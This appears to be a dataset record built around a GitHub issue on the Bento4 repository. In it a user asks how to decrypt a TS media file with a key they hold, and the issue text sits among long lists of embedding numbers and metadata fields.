0.012127520516514778, 0.00020587121252901852, 0.005910892505198717, -0.027035782113671303, 0.011392299085855484, 0.001976363593712449, -0.001021849224343896, -0.0046151550486683846, 0.0005677951266989112, -0.04137624800205231, 0.010365900583565235, 0.001354882842861116, -0.005310339853167534, 0.01101376861333847, -0.008174793794751167, -0.0004745274782180786, 0.008342220447957516, 0.012011050246655941, -0.0025059417821466923, 0.02377459965646267, -0.01699017733335495, -0.010693474672734737, 0.0052848621271550655, 0.03284476324915886, -0.003938168752938509, -0.03529065102338791, 0.0007907274411991239, 0.006384055130183697, 0.0032411636784672737, 0.01411480363458395, 0.007621557451784611, 0.009718031622469425, 0.0019690843764692545, -0.016771793365478516, -0.009863619692623615, 0.00525938393548131, -0.005441369488835335, -0.017208559438586235, 0.004313059151172638, -0.003981844987720251, 0.0014176678378134966, 0.011858182027935982, -0.0006505985511466861, -0.015534291975200176, -0.0036378924269229174, 0.02115400694310665, -0.008902736008167267, 0.0023075775243341923, 0.0023658128920942545, 0.021052096039056778, 0.006344018504023552, -0.002014580648392439, -0.012185756117105484, 0.009186633862555027, -0.0032084062695503235, -0.010387738235294819, -0.005481406580656767, -0.020120328292250633, 0.007162953726947308, -0.01474811416119337, 0.017033852636814117, -0.0037598225753754377, -0.009761707857251167, -0.0017925582360476255, 0.011122960597276688, -0.0015705358237028122, 0.01643694005906582, -0.007978249341249466, -0.012688037008047104, 0.004145632032305002, 0.03418417647480965, -0.016961058601737022, 0.0024622653145343065, 0.011887299828231335, -0.009332221932709217, 0.009965531527996063, -0.0024804638233035803, 0.018052972853183746, 0.02508489601314068, -0.0049900454469025135, -0.007526924833655357, 0.010322223417460918, 0.0002340789942536503, -0.0063294596038758755, 0.011719873175024986, 0.018329590559005737, 0.006307621020823717, -0.008924574591219425, 0.0016296810936182737, 0.005867215804755688, 0.004855376202613115, 0.008385896682739258, -0.010977371595799923, -0.010132959112524986, 0.004174749832600355, -0.0007807182846590877, 0.027283282950520515, 0.012251270934939384, 0.01043869461864233, -0.014791790395975113, 0.02475004270672798, 0.010620679706335068, -0.009092001244425774, -0.008364059031009674, -0.01971268095076084, -0.03293211758136749, 0.031912997364997864, -0.026249604299664497, 0.028258726000785828, 0.015286791138350964, 0.0036251533310860395, 0.009958252310752869, -0.013510611839592457, 0.011559725739061832, 0.001297557377256453, 0.010445973835885525, -0.014820908196270466, -0.008655235171318054, -0.012171197682619095, 0.0016387803480029106, 0.012280388735234737, 0.010045605711638927, -0.0007925473037175834, -0.0007761685992591083, -0.015927379950881004, -0.004658831749111414, -0.0002031414333032444, 0.02202753722667694, 0.0008498727693222463, 0.013081125915050507, -0.0033630940597504377, -0.00345408683642745, 0.009470530785620213, -0.017106646671891212, 0.007326740771532059, -0.017456060275435448, 0.025157690048217773, -0.01007472351193428, -0.006751665845513344, -0.023847393691539764, 0.026104016229510307, -0.02361445315182209, -0.004378573969006538, -0.013204875402152538, -0.013408700004220009, 0.012979213148355484, 0.0033376161009073257, -0.002274820115417242, -0.014369583688676357, 0.004145632032305002, 0.002072816016152501, -0.0013284949818626046, 0.02678828127682209, 0.003767102025449276, 0.014653481543064117, -0.010758989490568638, -0.006526004057377577, 0.0017925582360476255, 0.02003297582268715, 0.01685914769768715, -0.006762585137039423, 0.003956367261707783, -0.00850236788392067, -0.02118312567472458, -0.008764427155256271, -0.004200228024274111, -0.016771793365478516, 0.011668916791677475, 0.010627959854900837, 0.0035414400044828653, 0.006387694738805294, -0.008451411500573158, 0.019130326807498932, 0.016058409586548805, -0.0013394140405580401, -0.016466058790683746, -0.00015684885147493333, -0.01614576391875744, 0.012251270934939384, 0.002283919369801879, 0.008837221190333366, 0.003508682595565915, -0.005568759515881538, -0.006544202566146851, -0.003748903516680002, 0.00907744187861681, 0.007319461088627577, 0.007286703679710627, 0.01064979750663042, 0.04329801723361015, 0.007232108153402805, 0.00010947571718133986, 0.0006242106319405138, -0.017325030639767647, -0.006737107411026955, -0.0005791691946797073, -0.026249604299664497, -0.0003041434392798692, 0.0023949306923896074, -0.0011710773687809706, 0.0031192332971841097, 0.01872267946600914, -0.011930976063013077, -0.009332221932709217, -0.010031046345829964, -0.00201822048984468, -0.01671355776488781, 0.018897386267781258, 0.009608840569853783, 0.00547776697203517, -0.0038144183345139027, 0.0033012188505381346, 0.005514163989573717, -0.0121639184653759, 0.024982985109090805, 0.006063760258257389, 0.011676196940243244, 0.020382387563586235, 0.0012839084956794977, 0.0160001739859581, 0.009754428640007973, 0.01102104876190424, -0.015548850409686565, -0.012484212405979633, 0.009004647843539715, 0.010598842054605484, 0.018649885430932045, 0.01668444089591503, -0.01773267798125744, -0.03526153042912483, 0.0028280564583837986, 0.018518855795264244, -0.0016351407393813133, 0.007788984104990959, 0.015796350315213203, -0.016364146023988724, 0.009718031622469425, -0.006267584394663572, 0.0138163473457098, 0.02019312232732773, 0.005805341061204672, -0.0048881336115300655, 0.007927292957901955, 0.001992742298170924, 0.029700051993131638, 0.0031629097647964954, -0.00583081878721714, -0.004844456911087036, -0.012185756117105484, 0.014282230287790298, -0.021794596686959267, 0.007577880751341581, 0.0027825599536299706, -0.001989102689549327, 0.023119451478123665, 0.0035960355307906866, -0.015403262339532375, -0.0018908304627984762, -0.009354060515761375, 0.003872653702273965, 0.02288651093840599, 0.01166163757443428, -0.015650762245059013, 0.014173039235174656, 0.0121639184653759, -0.010547885671257973, -0.023425187915563583, 0.024589896202087402, -0.0017661703750491142, -0.011435975320637226, 0.011050166562199593, 0.0060346429236233234, 0.008371338248252869, -0.009041044861078262, -0.0035996753722429276, 0.00937589816749096, -0.02633695676922798, -0.013314067386090755, -0.017062971368432045, -0.03948359936475754, 0.0035232414957135916, 0.011996490880846977, -0.0012702594976872206, 0.015548850409686565, -0.03785300627350807, -0.010846341960132122, 0.007606998551636934, -0.0025714565999805927, 0.011341342702507973, -0.010970092378556728, 0.002979104407131672, 0.01549061480909586, -0.026569899171590805, 0.009623399004340172, 0.01597105711698532, 0.010540606454014778, -0.002094654366374016, 0.013277670368552208, -0.010860901325941086, 0.013692596927285194, 0.0009199372725561261, 0.0016715377569198608, 0.01007472351193428, 0.00525938393548131, 0.016815470531582832, 0.00893185380846262, -0.0051938691176474094, 0.010569724254310131, 0.005517803598195314, -0.006274863611906767, -0.02475004270672798, 0.002094654366374016, 0.013161199167370796, 0.00007006445957813412, 0.0033976712729781866, -0.0263806339353323, 0.004793500993400812, 0.0002468179736752063, -0.02244974486529827, 0.018489737063646317, -0.0009672535234130919, 0.0030264207161962986, -0.00325572257861495, 0.011792667210102081, 0.001380360801704228, 0.019756358116865158, 0.010205753147602081, 0.006729827728122473, 0.0038144183345139027, 0.011741711758077145, 0.003854455193504691, -0.011195754632353783, -0.005237545818090439, -0.0030682773794978857, -0.006216628476977348, -0.022406067699193954, -0.02345430478453636, -0.0030992149841040373, 0.00813111662864685, 0.018082089722156525, -0.014304068870842457, -0.004957288037985563, 0.010511488653719425, -0.00942685455083847, -0.004964567255228758, 0.01102104876190424, 0.015417820774018764, -0.0033849324099719524, -0.009019207209348679, 0.010103841312229633, 0.022245921194553375, 0.00813111662864685, 0.02131415531039238, -0.021357830613851547, -0.0012784488499164581, -0.029001226648688316, -0.006205709185451269, 0.010402297601103783, -0.002729784231632948, 0.0003801224520429969, 0.003408590564504266, -0.03427153080701828, -0.02563813328742981, 0.004414970986545086, -0.005030082073062658, -0.0065733203664422035, 0.009783546440303326, -0.007392255589365959, -0.011246711015701294, -0.004131073132157326, -0.002198386238887906, 0.004997324664145708, 0.019960181787610054, -0.017033852636814117, 0.002864453475922346, 0.000977262738160789, -0.008917294442653656, -0.007221188861876726, 0.05185861885547638, 0.009273986332118511, 0.039833009243011475, 0.014813628979027271, 0.0003225694817956537, 0.032175056636333466, -0.008902736008167267, -0.0032866601832211018, -0.01870812103152275, 0.0036833886988461018, 0.018373267725110054, 0.0017852787859737873, 0.009557884186506271, 0.0025805558543652296, -0.001896289992146194, 0.016218557953834534, -0.008560603484511375, 0.008546044118702412, -0.00929582491517067, -0.013561567291617393, -0.009223030880093575, -0.014820908196270466, 0.021052096039056778, -0.013918259181082249, -0.0009253968019038439, -0.015141203068196774, 0.009455972351133823, -0.019203120842576027, -0.01267347764223814, 0.0317382887005806, 0.019960181787610054, -0.001752521377056837, -0.010678915306925774, 0.006442290730774403, 0.012775389477610588, -0.0009608840337023139, 0.02608945593237877, 0.017834588885307312, 0.008043764159083366, -0.01585458591580391, -0.005215707700699568, 0.008298544213175774, -0.00841501448303461, 0.011923696845769882, 0.007184791844338179, 0.004414970986545086, -0.004087396897375584, 0.010904577560722828, 0.005914532113820314, 0.0014367763651534915, 0.008553323335945606, 0.0022056656889617443, -0.005102876573801041, 0.022682685405015945, 0.015155761502683163, 0.003614234272390604, -0.0018926503835245967, 0.0015932839596644044, -0.0012293127365410328, -0.020498858764767647, -0.003463186090812087, -0.0033922118600457907, -0.005637913942337036, -0.013488773256540298, -0.029845640063285828, -0.016451498493552208, 0.0011101121781393886, 0.0035414400044828653, -0.028913874179124832, 0.030427994206547737, 0.0014367763651534915, -0.007767145987600088, -0.016626205295324326, -0.007210270036011934, -0.005921811796724796, -0.013052008114755154, 0.013183037750422955, -0.0072648655623197556, 0.0020382388029247522, 0.005896333605051041, -0.0036688297986984253, -0.010766268707811832, 0.016466058790683746, 0.0019472460262477398, 0.0017416023183614016, -0.014304068870842457, -0.02349798195064068, -0.0018207660177722573, -0.008101998828351498, 0.023294158279895782, 0.013547008857131004, -0.0003616964095272124, -0.001874451758340001, -0.022653568536043167, 0.030340639874339104, -0.0001619671966182068, 0.0011028328444808722, -0.003084656083956361, -0.006569680292159319, 0.011304945684969425, 0.028884755447506905, 0.0036542711313813925, -0.027137694880366325, 0.009950973093509674, 0.01697561703622341, 0.0027734606992453337, -0.002245702315121889, -0.01770355924963951, -0.00184533407445997, 0.007701631169766188, 0.025026660412549973, -0.011690755374729633, -0.02202753722667694, -0.004120154306292534, 0.016203997656702995, -0.0013476033927872777, 0.008815382607281208, -0.006344018504023552, 0.019348710775375366, 0.007599718868732452, -0.012564286589622498, 0.011625240556895733, 0.029277844354510307, 0.02244974486529827, 0.0008485079160891473, -0.010962813161313534, -0.01512664370238781, 0.014063848182559013, 0.009004647843539715, 0.013692596927285194, 0.010642518289387226, -0.0038944920524954796, 0.037823889404535294, 0.006922732573002577, 0.00032234200625680387, 0.007839939557015896, -0.0062493858858942986, 0.013525170274078846, 0.004553279839456081, 0.01346693467348814, 0.02176547795534134, 0.05273215100169182, -0.011435975320637226, 0.01656796969473362, -0.014071127399802208, 0.0005041001131758094, -0.0073049021884799, 0.03799859434366226, 0.002675188472494483, -0.004757103975862265, 0.012920978479087353, 0.0288265198469162, 0.012447815388441086, -0.009601560421288013, -0.007010085508227348, 0.010067444294691086, 0.02508489601314068, 0.019130326807498932, 0.0016951959114521742, 0.009113838896155357, -0.005546921398490667, 0.00807288195937872, 0.008910015225410461, 0.006638835184276104, -0.010729871690273285, -0.003799859434366226, 0.0010336783016100526, -0.02550710365176201, 0.02030959352850914, -0.0065733203664422035, -0.027195928618311882, -0.02361445315182209, -0.0005336728063412011, 0.003273921087384224, 0.004043720196932554, -0.004214786924421787, 0.017514295876026154, -0.019130326807498932, 0.00985634047538042, 0.005339457653462887, 0.025434307754039764, 0.013496052473783493, -0.023134009912610054, 0.005481406580656767, 0.03098122961819172, -0.006314900703728199, -0.00486265541985631, -0.008939133025705814, 0.0030136816203594208, 0.007767145987600088, -0.006263944786041975, -0.00813839677721262, 0.009106559678912163, 0.003475925186648965, -0.017383266240358353, 0.020804595202207565, 0.01534502673894167, -0.004502323921769857, 0.05016979202628136, -0.013488773256540298, -0.002005481394007802, -0.029932992532849312, -0.007450490724295378, 0.011472372338175774 ]
3,598
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
Hello, Could you tell me is it possible to decrypt ts file and eventually how? I have a key, but i am not able to decrypt it ;( Help me :)
TS decrypt - could you help me?
https://api.github.com/repos/axiomatic-systems/Bento4/issues/587/comments
1
2021-03-08T20:18:38
2021-03-26T19:42:23Z
https://github.com/axiomatic-systems/Bento4/issues/587
824,916,524
587
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : TS decrypt - could you help me? Issue date: --- start body --- Hello, Could you tell me is it possible to decrypt ts file and eventually how? I have a key, but i am not able to decrypt it ;( Help me :) --- end body ---
290
[ -0.005016427021473646, -0.0017954211216419935, -0.012694934383034706, -0.03327971324324608, -0.0021541346795856953, -0.01701061986386776, 0.006395666394382715, 0.04191108047962189, -0.015483074821531773, 0.07682215422391891, 0.012909977696835995, -0.02725851535797119, -0.019042402505874634, 0.021400457248091698, 0.015038158744573593, 0.00780827458947897, -0.006721938028931618, 0.0020429056603461504, -0.023150458931922913, -0.0305805541574955, 0.016980957239866257, 0.008750013075768948, 0.03280513361096382, -0.001852889428846538, 0.008208698593080044, 0.0063660056330263615, -0.02251274697482586, -0.009157853201031685, -0.04300853982567787, -0.03126275911927223, 0.010292388498783112, 0.025745801627635956, -0.0053686522878706455, -0.023076307028532028, 0.02540469914674759, 0.016239430755376816, -0.004660494159907103, 0.04633057862520218, -0.02954241819679737, 0.03728395327925682, -0.03408056125044823, -0.046152614057064056, 0.0011252665426582098, 0.0008268021047115326, -0.025315716862678528, -0.007322574499994516, 0.007333697751164436, -0.024574190378189087, 0.009172683581709862, 0.01248730719089508, -0.016328414902091026, -0.03372462838888168, -0.036750055849552155, -0.015453413128852844, 0.003633480053395033, -0.020391980186104774, 0.03188564255833626, -0.022527577355504036, 0.0080603938549757, 0.014066758565604687, -0.006099055986851454, -0.014393030665814877, 0.012568875215947628, 0.0465085469186306, 0.010507430881261826, 0.023743679746985435, -0.003679825458675623, 0.024766987189650536, -0.05460601672530174, 0.037669550627470016, 0.012924808077514172, 0.005843229126185179, 0.02316528931260109, 0.002185649471357465, 0.0045789266005158424, -0.03336869552731514, 0.0448475256562233, 0.019442826509475708, 0.007278082892298698, 0.0403687059879303, -0.0644831508398056, 0.020377149805426598, -0.04087294265627861, -0.006892489269375801, 0.015038158744573593, -0.004174794536083937, -0.09728828072547913, -0.0692882388830185, -0.03431784734129906, 0.02009536884725094, 0.025197071954607964, 0.005880305543541908, 0.024247918277978897, -0.019264860078692436, 0.0501568578183651, 0.025271225720643997, -0.0044899433851242065, -0.023847494274377823, -0.03669073432683945, -0.05852127447724342, 0.003522251034155488, 0.007971410639584064, -0.013592181727290154, -0.007185392081737518, 0.022913170978426933, -0.013733072206377983, 0.02110384590923786, 0.005724585149437189, 0.029750045388936996, 0.06650010496377945, -0.010648321360349655, 0.010700228624045849, 0.01687714457511902, 0.004341638181358576, -0.011360187083482742, -0.022809356451034546, -0.024158935993909836, -0.05875856429338455, -0.021370794624090195, -0.039538197219371796, -0.02240893244743347, -0.03289411962032318, -0.005924797151237726, 0.027317838743329048, -0.02111867628991604, 0.05454669147729874, -0.02138562500476837, 0.023936476558446884, -0.010722474195063114, -0.025478852912783623, -0.02940894290804863, -0.03947887197136879, -0.02871190756559372, 0.007556155789643526, 0.027807245030999184, 0.05279669165611267, 0.001878842944279313, 0.03559327498078346, -0.03431784734129906, 0.01859748549759388, -0.020436471328139305, -0.013695995323359966, 0.0072447145357728004, -0.015705531463027, -0.021919524297118187, -0.014452352188527584, 0.007537617348134518, 0.007904672995209694, -0.021682236343622208, 0.047368716448545456, 0.013073112815618515, -0.025553004816174507, -0.009424802847206593, 0.0023172704968601465, 0.01635807566344738, 0.027391990646719933, -0.027673771604895592, 0.04283057525753975, 0.032182253897190094, 0.017500026151537895, -0.012101713567972183, -0.03402123972773552, 0.01766316220164299, 0.0042786081321537495, -0.0007725780014880002, -0.030728859826922417, 0.015646209940314293, 0.006759014446288347, -0.013480952940881252, 0.018894096836447716, -0.0024451836943626404, -0.014207649044692516, -0.021697066724300385, 0.0016610195161774755, -0.03271615132689476, -0.04624159634113312, -0.003322039032354951, -0.015408921986818314, -0.014964005909860134, -0.05564415082335472, -0.030461911112070084, 0.0018769890302792192, 0.017930112779140472, -0.0027028643526136875, 0.006970349699258804, -0.01798943430185318, 0.05285601317882538, -0.060983143746852875, 0.028266992419958115, 0.009202344343066216, 0.02838563732802868, 0.07166112959384918, 0.01216845028102398, -0.007367066107690334, 0.0342881865799427, 0.004356468562036753, -0.009209759533405304, -0.022720374166965485, -0.02046613208949566, -0.0032367634121328592, 0.01004768442362547, -0.026116564869880676, -0.009943870827555656, -0.017633501440286636, -0.02312079817056656, 0.02260172925889492, 0.001965045463293791, 0.01649155095219612, 0.0013069405686110258, -0.009795566089451313, -0.052084825932979584, -0.0342881865799427, 0.014697056263685226, 0.009773319587111473, -0.013473537750542164, 0.00755986338481307, -0.03147038817405701, -0.014689641073346138, -0.01566104032099247, 0.01887926645576954, 0.024944953620433807, -0.006087933201342821, 0.031055131927132607, -0.019828420132398605, -0.010173744522035122, -0.024381393566727638, -0.021177997812628746, 0.03052123263478279, 0.02381783351302147, -0.010982008650898933, 0.029750045388936996, 0.04520345851778984, -0.009884549304842949, -0.02064409852027893, 0.011983068659901619, -0.03799581900238991, 0.013888792134821415, -0.04013141617178917, 0.01827121339738369, -0.02927546761929989, -0.04790261387825012, 0.0034425370395183563, 0.007170561701059341, -0.014177987352013588, -0.045084815472364426, 0.05736449360847473, -0.02312079817056656, 0.04389837011694908, -0.011716119945049286, 0.017722483724355698, 0.01655087247490883, 0.012783917598426342, 0.02218647487461567, 0.018523333594202995, -0.02991318143904209, 0.011056160554289818, -0.0033387232106179, 0.04250430315732956, -0.02516741119325161, -0.03289411962032318, 0.005869182758033276, -0.021786050871014595, -0.01125637348741293, -0.035949207842350006, -0.005172147881239653, -0.0033869226463139057, -0.0026491035241633654, -0.019739435985684395, -0.011211881414055824, -0.05092804506421089, 0.009884549304842949, 0.004400960169732571, 0.008386665023863316, 0.008987301960587502, -0.020584776997566223, 0.000836534658446908, -0.013777563348412514, -0.0019261152483522892, 0.009202344343066216, -0.013013791292905807, -0.033012762665748596, 0.014370784163475037, 0.03449581563472748, 0.002057736273854971, 0.023521222174167633, -0.044432271271944046, 0.007463464979082346, 0.012309340760111809, -0.06006364896893501, -0.009587937965989113, 0.013043452054262161, 0.032419539988040924, -0.026813600212335587, -0.012175866402685642, -0.014637733809649944, -0.008638784289360046, 0.0012272264575585723, -0.03327971324324608, -0.005980411544442177, 0.016194939613342285, -0.02614622563123703, 0.0034036068245768547, -0.022349610924720764, 0.012880316004157066, -0.04437294974923134, 0.017322059720754623, 0.02797038108110428, 0.03704666718840599, -0.022245796397328377, -0.017766976729035378, 0.041228875517845154, -0.034228865057229996, -0.04953397437930107, 0.00008602866728324443, -0.028400467708706856, 0.003233055816963315, 0.015735194087028503, -0.0024043999146670103, -0.02329876460134983, 0.02940894290804863, 0.012643028050661087, 0.04054667055606842, -0.04552973061800003, -0.009840057231485844, -0.002059590071439743, -0.0379364974796772, -0.012272264808416367, 0.024692833423614502, 0.006047149188816547, 0.013006376102566719, 0.018997909501194954, 0.02340257726609707, -0.0026565189473330975, 0.052203468978405, 0.017500026151537895, -0.017974603921175003, -0.009172683581709862, -0.029008518904447556, -0.0022746326867491007, 0.011360187083482742, 0.019072063267230988, 0.004860706627368927, 0.023269103839993477, -0.01892375759780407, 0.010848533362150192, 0.0030921658035367727, -0.007519079372286797, 0.027525465935468674, 0.011552983894944191, 0.04461023584008217, 0.0008448768057860434, -0.03150004893541336, 0.010477770119905472, 0.005850644316524267, 0.00943963322788477, -0.031766995787620544, -0.024529699236154556, -0.03591954708099365, 0.040428027510643005, 0.0013078674674034119, 0.024084782227873802, -0.02534537762403488, -0.007229883689433336, 0.06240687519311905, -0.00608422514051199, -0.00715202372521162, -0.034792426973581314, 0.03416954353451729, -0.03108479268848896, 0.005101702641695738, 0.028771230950951576, 0.009157853201031685, -0.03123309835791588, 0.01981358975172043, 0.012835824862122536, -0.01186442468315363, -0.005735707934945822, 0.0031032885890454054, -0.0415848083794117, 0.02240893244743347, -0.045885663479566574, -0.021741557866334915, 0.05395347252488136, -0.010077346116304398, 0.01218328159302473, -0.017262738198041916, 0.012872900813817978, 0.01136760227382183, -0.04398735612630844, -0.019190706312656403, -0.009424802847206593, 0.029957672581076622, -0.0050683338195085526, -0.062050942331552505, -0.019605962559580803, 0.025508513674139977, -0.05270770564675331, -0.008193868212401867, 0.016194939613342285, -0.03482208773493767, 0.020169522613286972, -0.008601708337664604, 0.01635807566344738, -0.03473310545086861, -0.024944953620433807, 0.008698106743395329, -0.016328414902091026, -0.016194939613342285, 0.007255837321281433, 0.001827862928621471, -0.011397263035178185, -0.01859748549759388, -0.019398335367441177, -0.009335819631814957, 0.01887926645576954, 0.029616570100188255, -0.00813454668968916, 0.014252140186727047, 0.006577340420335531, 0.03458479791879654, 0.005342698656022549, -0.0036316262558102608, -0.02679876983165741, -0.01554239634424448, 0.04372040554881096, 0.016580533236265182, 0.017870789393782616, 0.014519089832901955, 0.04885176941752434, -0.035771239548921585, 0.010121837258338928, -0.0031014347914606333, -0.010537092573940754, -0.019591132178902626, 0.03500005230307579, -0.018938587978482246, -0.013214003294706345, -0.021355964243412018, 0.006940688472241163, 0.0338432714343071, -0.018894096836447716, 0.03230089694261551, -0.012583705596625805, 0.006725645624101162, 0.04819922521710396, -0.005661555100232363, -0.03686869889497757, -0.04039836674928665, 0.05516957491636276, -0.025226732715964317, 0.016521211713552475, 0.0391526035964489, 0.011708703823387623, -0.005064626224339008, -0.04692380130290985, -0.02275003492832184, -0.01742587424814701, 0.01827121339738369, 0.0199915561825037, 0.03378394991159439, -0.010351710952818394, 0.018389858305454254, 0.006788675673305988, -0.019739435985684395, 0.019843250513076782, 0.01603180356323719, -0.032419539988040924, -0.01738138310611248, -0.003164464607834816, 0.004341638181358576, 0.026813600212335587, 0.00637342082336545, 0.05006787180900574, 0.010915271006524563, 0.008305096998810768, 0.011716119945049286, 0.016194939613342285, -0.021593254059553146, -0.0461229532957077, -0.05419076234102249, -0.016847483813762665, -0.03630514070391655, 0.008104884997010231, 0.014148326590657234, -0.022853847593069077, -0.03327971324324608, -0.007237299345433712, -0.0017008765134960413, 0.02088138833642006, 0.0031088499817997217, -0.009083700366318226, -0.03971616178750992, 0.0010538946371525526, -0.015927990898489952, 0.0047049857676029205, 0.0023395163007080555, -0.021593254059553146, 0.01529027707874775, 0.009328404441475868, 0.0299725029617548, 0.012909977696835995, -0.00005830832014908083, 0.013176926411688328, -0.030209790915250778, 0.013080528005957603, -0.0018269360298290849, -0.01668434776365757, 0.03108479268848896, -0.017262738198041916, -0.004297146573662758, -0.0029327375814318657, -0.04208904877305031, 0.005680093541741371, -0.009639845229685307, -0.03882633149623871, -0.04013141617178917, -0.011775441467761993, 0.014971421100199223, 0.012361248023808002, -0.002623150125145912, -0.011397263035178185, -0.019324181601405144, -0.014444936998188496, 0.02101486176252365, -0.0009574961732141674, 0.01649155095219612, 0.022913170978426933, -0.007066748104989529, 0.006540264002978802, 0.009120776318013668, -0.012887731194496155, -0.013154680840671062, -0.005086872261017561, 0.017841128632426262, 0.01018115971237421, 0.03941955044865608, -0.01493434514850378, -0.019027572125196457, -0.0037372938822954893, 0.0216229148209095, -0.005072041414678097, 0.02423308789730072, -0.017040280625224113, 0.035444967448711395, -0.0619916208088398, -0.0173368901014328, 0.03402123972773552, 0.005220347084105015, 0.009068869985640049, -0.008653614670038223, -0.004449159372597933, 0.011805103160440922, -0.00537235988304019, -0.007741537410765886, -0.005331575870513916, 0.032923780381679535, 0.013028621673583984, 0.013799808919429779, 0.01293222326785326, -0.010870778933167458, -0.03787717595696449, 0.026620803400874138, 0.03203394636511803, -0.0026342731434851885, 0.001627650810405612, 0.0026250039227306843, -0.002076274249702692, 0.02125215157866478, -0.00862395390868187, 0.004493650980293751, 0.024692833423614502, 0.016743669286370277, 0.012769087217748165, 0.026694955304265022, 0.00492744380608201, 0.04268226772546768, 0.0008323635556735098, 0.01393328420817852, -0.014556165784597397, -0.01887926645576954, 0.05229245126247406, -0.037728872150182724, -0.018197061493992805, 0.006625539623200893, -0.00492744380608201, -0.023862324655056, -0.007322574499994516, -0.017084771767258644, -0.006870243698358536, -0.039033956825733185, -0.026264870539307594, -0.017307229340076447, 0.006625539623200893, -0.006936980877071619, 0.010151498951017857, -0.00624365359544754, 0.01849367283284664, 0.004119180142879486, 0.018538163974881172, 0.02236444130539894, -0.019917402416467667, 0.01549790520220995, 0.01603180356323719, 0.000305879715597257, -0.007074163295328617, -0.02442588470876217, -0.022631390020251274, 0.005850644316524267, -0.03918226435780525, 0.029616570100188255, -0.012072051875293255, 0.004311976954340935, 0.04959329590201378, -0.016980957239866257, 0.023565713316202164, 0.01360701210796833, 0.006225115619599819, 0.018938587978482246, -0.009024377912282944, -0.002061443869024515, 0.005943335127085447, -0.026635633781552315, 0.04603396728634834, -0.015527565963566303, 0.022201305255293846, 0.014289217069745064, 0.005016427021473646, -0.023150458931922913, 0.00045997818233445287, -0.024589020758867264, -0.035682257264852524, 0.024114442989230156, -0.018345367163419724, -0.0034647828433662653, -0.02013986185193062, 0.012783917598426342, 0.011567814275622368, -0.043542440980672836, 0.01766316220164299, -0.008030732162296772, -0.009543446823954582, -0.0005742196226492524, -0.005787614732980728, 0.033339034765958786, -0.01398519054055214, 0.0309958104044199, -0.016461890190839767, -0.008787089958786964, 0.02432207018136978, -0.021756388247013092, -0.025434359908103943, -0.011894085444509983, 0.028964027762413025, 0.01529027707874775, 0.014993666671216488, -0.01449684426188469, -0.008490478619933128, 0.015104895457625389, -0.0006636662874370813, -0.027199193835258484, -0.02666529454290867, -0.013288156129419804, 0.005072041414678097, 0.015779685229063034, 0.00918009877204895, 0.011545568704605103, 0.012227772735059261, -0.01803392544388771, -0.027555126696825027, 0.0014413422904908657, 0.010314634069800377, -0.04659752920269966, 0.0013866546796634793, -0.0018686469411477447, 0.0028882459737360477, 0.004808799829334021, -0.02297249250113964, 0.01718858629465103, 0.012101713567972183, -0.045974645763635635, -0.0009306158171966672, -0.0183601975440979, 0.00031700258841738105, -0.00013822517939843237, -0.0064920648001134396, 0.017396213486790657, -0.015334769152104855, -0.01267268881201744, -0.008327343501150608, -0.05125431716442108, 0.03123309835791588, 0.018997909501194954, 0.027050888165831566, 0.021919524297118187, -0.0003223323146812618, -0.024158935993909836, -0.009387725964188576, -0.005450220312923193, -0.03850005939602852, -0.020911049097776413, -0.01748519577085972, -0.004323099739849567, 0.00437129894271493, 0.011523322202265263, 0.010959762148559093, 0.025478852912783623, 0.01248730719089508, -0.008475648239254951, -0.019680114462971687, 0.0088760731741786, -0.00225980207324028, -0.018478842452168465, 0.014252140186727047, 0.009143022820353508, -0.019680114462971687, -0.002185649471357465, 0.021237321197986603, 0.0019279690459370613, -0.01747036539018154, -0.005706046707928181, -0.007697045803070068, -0.009513786062598228, -0.00453072739765048, -0.015601718798279762, -0.011708703823387623, -0.001737952814437449, -0.043928034603595734, 0.031055131927132607, 0.015067819505929947, 0.007741537410765886, -0.009721413254737854, -0.005287084262818098, 0.019843250513076782, 0.021889863535761833, -0.003587134648114443, 0.00854980107396841, 0.0012448376510292292, -0.016343245282769203, 0.014200233854353428, 0.01293222326785326, 0.0025916353333741426, 0.002104081679135561, -0.04291955754160881, -0.018656808882951736, 0.009083700366318226, -0.0080603938549757, -0.05914415791630745, 0.0002504969306755811, -0.020762743428349495, 0.01718858629465103, 0.0338432714343071, 0.0005728292744606733, 0.006210284773260355, -0.04766532778739929, 0.03215259313583374, 0.01268010400235653, 0.014363368973135948, 0.020896218717098236, 0.012761672027409077, -0.008527555502951145, 0.008001071400940418, 0.03645344451069832, -0.007719291374087334, 0.026072073727846146, 0.016891974955797195, -0.03933056816458702, 0.022201305255293846, 0.0063103907741606236, 0.027673771604895592, -0.04357210174202919, -0.029942842200398445, -0.001177173457108438, -0.02782207541167736, -0.044758543372154236, -0.00974365882575512, 0.004564095754176378, -0.01790045015513897, -0.03722463175654411, -0.01561654917895794, 0.011286034248769283, -0.014081588946282864, 0.01036654133349657, -0.04087294265627861, 0.0073818969540297985, -0.00565043231472373, -0.03015046939253807, 0.029423773288726807, 0.01004768442362547, 0.01393328420817852, 0.009595353156328201, 0.018330536782741547, -0.01975426822900772, 0.029008518904447556, -0.025790292769670486, 0.004627125803381205, 0.001673069316893816, 0.00437129894271493, 0.0305805541574955, -0.01798943430185318, 0.016714008525013924, 0.024396223947405815, 0.010121837258338928, 0.0026769109535962343, -0.035207681357860565, -0.0006562509806826711, 0.01748519577085972, 0.004679032601416111, -0.0070630405098199844, -0.008712937124073505, 0.02903817966580391, -0.017559349536895752, -0.006206577178090811, 0.0036742640659213066, 0.03182632103562355, 0.03677971661090851, -0.012294510379433632, 0.010240481235086918, 0.0011002400424331427, -0.005075749475508928, 0.01423730980604887, -0.0052500078454613686, 0.037817854434251785, -0.014066758565604687, -0.004745769780129194, 0.006047149188816547, -0.012353832833468914, 0.025108089670538902, 0.023847494274377823, 0.01460807304829359, 0.010240481235086918, -0.006877658888697624, 0.02949792705476284, -0.010225650854408741, 0.030358096584677696, -0.0342881865799427, 0.04585600271821022, -0.019872911274433136, -0.004141425713896751, -0.014704471454024315, 0.011219296604394913, -0.044343288987874985, 0.01062607578933239, -0.030076317489147186, -0.01044069416821003, -0.0029308837838470936, -0.027332669124007225, -0.01942799612879753, -0.02358054369688034, 0.0022894633002579212, 0.015141972340643406, 0.006454988848417997, -0.0029216145630925894, -0.005238885059952736, 0.018983079120516777, -0.007430096156895161, -0.007511664181947708, -0.024173766374588013, -0.025612326338887215, 0.01659536361694336, -0.0363348014652729, 0.03150004893541336, 0.02344707027077675, -0.02605724334716797, -0.020673761144280434, 0.0031032885890454054, -0.047190748155117035, 